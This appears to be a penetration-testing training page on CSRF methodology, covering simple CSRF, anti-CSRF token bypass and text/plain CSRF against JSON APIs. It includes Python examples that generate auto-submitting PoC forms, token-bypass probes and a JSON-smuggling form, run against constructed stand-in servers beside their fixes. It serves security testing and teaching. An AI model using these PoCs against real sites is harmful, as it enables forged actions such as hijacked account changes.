csrf-testing-methodology.md
Four kinds of CSRF tests can be run against an endpoint:

  1. Simple CSRF
  2. Anti-CSRF token bypass
  3. CSRF with Content-Type: text/plain
  4. Flash-based CSRF

1. Simple CSRF Testing Methodology

  1. Check whether the given API endpoint is cookie based.
       It must be cookie based: CSRF relies on the browser attaching the session cookie on its own, so an endpoint that needs an Authorization header or a custom header is out of scope. Also note the session cookie's SameSite attribute, since Lax or Strict will stop a cross-site POST from the PoC.

  2. Check whether the Origin and Referer headers are validated by the server: delete them and resend the request.

Origin: http://fl4tswa8w0y12jpm-apillab1.labs.peritustrainingschool.com
Referer: http://fl4tswa8w0y12jpm-apillab1.labs.peritustrainingschool.com/Csrf1

   They must not be validated by the server (the request must still succeed without them).

  3. If the server is not validating... 😃

  4. Exploit it.

Note: you can generate the PoC from Burp (Engagement tools > Generate CSRF PoC in Burp Suite Professional).
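The procedure above as an added, runnable example (not part of the original page or the lab): the cookie check, the Origin/Referer replay and a Burp-style PoC generator are driven through a pluggable `send` callable, so the script runs offline against two constructed stand-in servers and can later be pointed at a real target by swapping in a `requests`-based sender. The lab hostname is the one shown in the captured headers; the session cookie value, the `email` parameter, the attacker host `attacker.example` and both server implementations are assumptions.

```python
"""Simple CSRF check (steps 1, 2 and 4 above) driven through a pluggable `send`
callable, so it runs offline against the stand-in servers below."""
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple
import html

# Lab host copied from the captured headers on the page; everything else is constructed.
ALLOWED_ORIGIN = "http://fl4tswa8w0y12jpm-apillab1.labs.peritustrainingschool.com"
ATTACKER_ORIGIN = "http://attacker.example"   # assumed attacker-controlled host


@dataclass
class Request:
    method: str
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: Dict[str, str] = field(default_factory=dict)


Response = Tuple[int, str]               # (status, body)
Sender = Callable[[Request], Response]   # swap in requests/httpx for a real target


def is_cookie_authenticated(req: Request) -> bool:
    """Step 1: CSRF needs credentials the browser attaches by itself (cookies).
    A forged form post cannot carry an Authorization or custom header."""
    names = {k.lower() for k in req.headers}
    return "cookie" in names and not names & {"authorization", "x-requested-with"}


def with_headers(req: Request, remove=(), **replace: str) -> Request:
    """Copy of `req` with the named headers deleted and/or replaced."""
    gone = {n.lower() for n in remove} | {n.lower() for n in replace}
    headers = {k: v for k, v in req.headers.items() if k.lower() not in gone}
    headers.update(replace)
    return Request(req.method, req.url, headers, dict(req.body))


def origin_referer_check(send: Sender, captured: Request) -> Dict[str, bool]:
    """Step 2: resend with Origin/Referer deleted, plus a variant carrying what a
    form auto-submitted from the attacker's page really sends. True means the
    server answered exactly as it did for the genuine request."""
    expected = send(captured)
    variants = {
        "no_origin": with_headers(captured, remove=("Origin",)),
        "no_referer": with_headers(captured, remove=("Referer",)),
        "no_origin_no_referer": with_headers(captured, remove=("Origin", "Referer")),
        "foreign_origin": with_headers(captured, Origin=ATTACKER_ORIGIN,
                                       Referer=ATTACKER_ORIGIN + "/csrf.html"),
    }
    return {name: send(v) == expected for name, v in variants.items()}


def is_simple_csrf(send: Sender, captured: Request) -> bool:
    """The deleted-header variants show which header (if any) the server keys on;
    the foreign_origin variant is what the PoC produces and decides exploitability."""
    return is_cookie_authenticated(captured) and origin_referer_check(send, captured)["foreign_origin"]


def generate_poc(target: Request) -> str:
    """Step 4: auto-submitting form, the same shape Burp's 'Generate CSRF PoC' emits."""
    esc = lambda s: html.escape(s, quote=True)
    inputs = "\n".join(f'    <input type="hidden" name="{esc(k)}" value="{esc(v)}">'
                       for k, v in target.body.items())
    return (f'<html><body>\n  <form id="csrf" action="{esc(target.url)}" method="{target.method}">\n'
            f'{inputs}\n  </form>\n'
            '  <script>document.getElementById("csrf").submit();</script>\n</body></html>')


# --- constructed stand-ins for the lab endpoint so the check runs offline ---
def vulnerable_server(req: Request) -> Response:
    """Checks only the session cookie: the case step 3 hopes for."""
    if req.headers.get("Cookie") != "session=abc123":
        return 401, "login required"
    return 200, f"email changed to {req.body.get('email')}"


def validating_server(req: Request) -> Response:
    """Same endpoint, but accepts only when Origin or Referer names the site."""
    origin = req.headers.get("Origin")
    referer = req.headers.get("Referer", "")
    if origin != ALLOWED_ORIGIN and not referer.startswith(ALLOWED_ORIGIN + "/"):
        return 403, "cross-site request rejected"
    return vulnerable_server(req)


CAPTURED = Request("POST", ALLOWED_ORIGIN + "/Csrf1",
                   {"Cookie": "session=abc123", "Origin": ALLOWED_ORIGIN,
                    "Referer": ALLOWED_ORIGIN + "/Csrf1",
                    "Content-Type": "application/x-www-form-urlencoded"},
                   {"email": "attacker@example.com"})

if __name__ == "__main__":
    for name, srv in (("vulnerable", vulnerable_server), ("validating", validating_server)):
        print(name, origin_referer_check(srv, CAPTURED), "exploitable:", is_simple_csrf(srv, CAPTURED))
    print(generate_poc(CAPTURED))
```

Against the validating stand-in, dropping only one of the two headers is still accepted (it falls back to the other), which is why the deciding variant is the one a real PoC page sends: a foreign Origin and Referer together.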

2. Testing when anti-CSRF tokens are enabled

Note: Repeat every test below with the request method changed as well (e.g. POST to GET); token checks are often wired to one method only.

  1. First, send the token parameter with a blank value and check whether the server accepts it (use Burp and remove the token value).

Token : Blank_Value

  2. Second, remove the parameter and the anti-CSRF token completely.

  3. Send a token of the same length with a few characters changed.

  4. Send another user's valid anti-CSRF token (this shows whether the token is tied to the session).
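The four token variants above, each repeated with the method switched as the note asks, as an added example that is not from the original page. A constructed `weak_server` carries three mistakes a tester meets regularly (the token is checked only when the parameter is present, only on POST, and against every issued token instead of the caller's own), and `strict_server` shows the fix. The parameter name `csrf_token`, the URL, the session ids and the token values are assumptions.

```python
"""Anti-CSRF token bypass probes, driven through a pluggable `send` so they run
offline here against constructed servers."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

TOKEN_PARAM = "csrf_token"   # assumed parameter name; take it from the captured request
REMOVED = None               # marker: drop the parameter entirely


@dataclass
class Request:
    method: str
    url: str
    cookies: Dict[str, str] = field(default_factory=dict)
    params: Dict[str, str] = field(default_factory=dict)   # body for POST, query for GET


Response = Tuple[int, str]
Sender = Callable[[Request], Response]


def mutate_same_length(token: str, n: int = 3) -> str:
    """Change a few characters but keep the length (catches length-only checks)."""
    chars = list(token)
    for i in range(min(n, len(chars))):
        chars[i] = "a" if chars[i] != "a" else "b"
    return "".join(chars)


def token_variants(valid: str, other_users: str) -> Dict[str, Optional[str]]:
    """Tests 1-4 from the list above."""
    return {
        "blank_value": "",
        "parameter_removed": REMOVED,
        "mutated_same_length": mutate_same_length(valid),
        "other_users_token": other_users,
    }


def with_token(req: Request, method: str, token: Optional[str]) -> Request:
    params = {k: v for k, v in req.params.items() if k != TOKEN_PARAM}
    if token is not REMOVED:
        params[TOKEN_PARAM] = token
    return Request(method, req.url, dict(req.cookies), params)


def probe_token_bypass(send: Sender, captured: Request, other_users: str,
                       methods=("POST", "GET")) -> Dict[Tuple[str, str], bool]:
    """True = the server answered exactly as it did for the genuine request."""
    expected = send(captured)
    results = {}
    for method in methods:
        for name, token in token_variants(captured.params[TOKEN_PARAM], other_users).items():
            results[(method, name)] = send(with_token(captured, method, token)) == expected
    return results


def bypasses(send: Sender, captured: Request, other_users: str) -> List[Tuple[str, str]]:
    """The (method, variant) combinations the server accepted."""
    return sorted(k for k, ok in probe_token_bypass(send, captured, other_users).items() if ok)


# --- constructed stand-ins: session id -> token issued to that session ---
ISSUED_TOKENS = {"s1": "3f9a1c77b2e04d8e", "s2": "9c0d4e11aa55bb66"}


def weak_server(req: Request) -> Response:
    """Checks the token only when present, only on POST, and against every issued
    token rather than the one belonging to the caller's session."""
    session = req.cookies.get("session")
    if session not in ISSUED_TOKENS:
        return 401, "login required"
    if req.method == "POST" and TOKEN_PARAM in req.params:
        if req.params[TOKEN_PARAM] not in ISSUED_TOKENS.values():
            return 403, "bad csrf token"
    return 200, f"email changed to {req.params.get('email')}"


def strict_server(req: Request) -> Response:
    """Fix: always compare the submitted token with the one issued to this session."""
    session = req.cookies.get("session")
    if session not in ISSUED_TOKENS:
        return 401, "login required"
    if req.params.get(TOKEN_PARAM) != ISSUED_TOKENS[session]:
        return 403, "bad csrf token"
    return 200, f"email changed to {req.params.get('email')}"


CAPTURED = Request("POST", "https://target.example/account/email",   # assumed URL
                   {"session": "s1"},
                   {"email": "attacker@example.com", TOKEN_PARAM: ISSUED_TOKENS["s1"]})

if __name__ == "__main__":
    print("weak:  ", bypasses(weak_server, CAPTURED, ISSUED_TOKENS["s2"]))
    print("strict:", bypasses(strict_server, CAPTURED, ISSUED_TOKENS["s2"]))
```

Two of the four POST variants get through the weak server (parameter removed, another user's token) and all four do once the method is switched to GET; the strict server accepts none of them, which is the result a correctly implemented synchroniser token should give.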

3. CSRF Content-Type:text/plain

  1. Check that no anti-CSRF token is used. If a token is present, run the anti-CSRF token bypass tests first.
  2. Set Content-Type: text/plain on the request and verify that the server still processes the body. This matters for JSON APIs: a form with enctype="text/plain" is a simple request that the browser sends cross-origin without a CORS preflight, whereas application/json would trigger one.
  3. If it does, the endpoint is exploitable.
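How step 2 turns into a PoC against a JSON endpoint, as an added example not taken from the page: the browser encodes a text/plain form as `name=value` followed by CRLF per field, so splitting the JSON document across the field's name and value yields a body that still parses as JSON. The example models that encoding, builds the form, and contrasts a constructed `lenient_api` that parses whatever it receives with a `strict_api` that refuses anything but application/json. The payload, the `pad` key and the URL are assumptions.

```python
"""CSRF with Content-Type: text/plain against a JSON API. text/plain is a
CORS-safelisted content type, so the form post goes out cross-origin without
a preflight; the JSON is smuggled across the single field's name and value."""
import html
import json
from typing import Dict, List, Tuple


def split_json_for_text_plain(payload: Dict) -> Tuple[str, str]:
    """Return (name, value) such that name + "=" + value is valid JSON carrying
    `payload`. A throwaway key ("pad", assumed) absorbs the "=" the browser inserts."""
    doc = json.dumps({**payload, "pad": ""})   # ends with:  "pad": ""}
    return doc[:-2], '"}'                       # name ends with  "pad": "   value is  "}


def encode_text_plain_form(fields: List[Tuple[str, str]]) -> str:
    """Constructed model of the browser's text/plain form encoding (name=value, CRLF).
    Values containing CR/LF would be normalised by the browser and are not handled."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def generate_text_plain_poc(action: str, fields: List[Tuple[str, str]]) -> str:
    """Auto-submitting PoC; the quotes in the field name must be HTML-escaped."""
    esc = lambda s: html.escape(s, quote=True)
    inputs = "\n".join(f'    <input type="hidden" name="{esc(n)}" value="{esc(v)}">'
                       for n, v in fields)
    return (f'<html><body>\n  <form id="csrf" action="{esc(action)}" method="POST" enctype="text/plain">\n'
            f'{inputs}\n  </form>\n'
            '  <script>document.getElementById("csrf").submit();</script>\n</body></html>')


def parsed_by_server(body: str) -> Dict:
    """What a JSON parser makes of the text/plain body (trailing CRLF is whitespace)."""
    return json.loads(body)


# --- constructed API handlers: the failure mode and the fix ---
def lenient_api(content_type: str, body: str) -> Tuple[int, str]:
    """Parses the body as JSON whatever Content-Type says: step 2 succeeds."""
    try:
        data = parsed_by_server(body)
    except ValueError:
        return 400, "bad json"
    return 200, f"email changed to {data.get('email')}"


def strict_api(content_type: str, body: str) -> Tuple[int, str]:
    """Refuses anything but application/json, which a cross-origin form cannot send."""
    if content_type.split(";")[0].strip().lower() != "application/json":
        return 415, "unsupported media type"
    return lenient_api(content_type, body)


PAYLOAD = {"email": "attacker@example.com", "role": "admin"}   # constructed target body
TARGET = "https://target.example/api/profile"                   # assumed endpoint


def run_text_plain_test(api) -> Tuple[int, str]:
    """Send what the browser would send for the PoC form and return the API's answer."""
    name, value = split_json_for_text_plain(PAYLOAD)
    return api("text/plain", encode_text_plain_form([(name, value)]))


if __name__ == "__main__":
    name, value = split_json_for_text_plain(PAYLOAD)
    print(repr(encode_text_plain_form([(name, value)])))
    print("lenient:", run_text_plain_test(lenient_api), "strict:", run_text_plain_test(strict_api))
    print(generate_text_plain_poc(TARGET, [(name, value)]))
```

The encoded body is `{"email": "attacker@example.com", "role": "admin", "pad": "="}` plus CRLF; the API sees the intended fields and an extra `pad` key it ignores. Rejecting non-JSON content types is the server-side fix this test probes for, and it is only a fix because browsers will not send application/json cross-origin without a preflight.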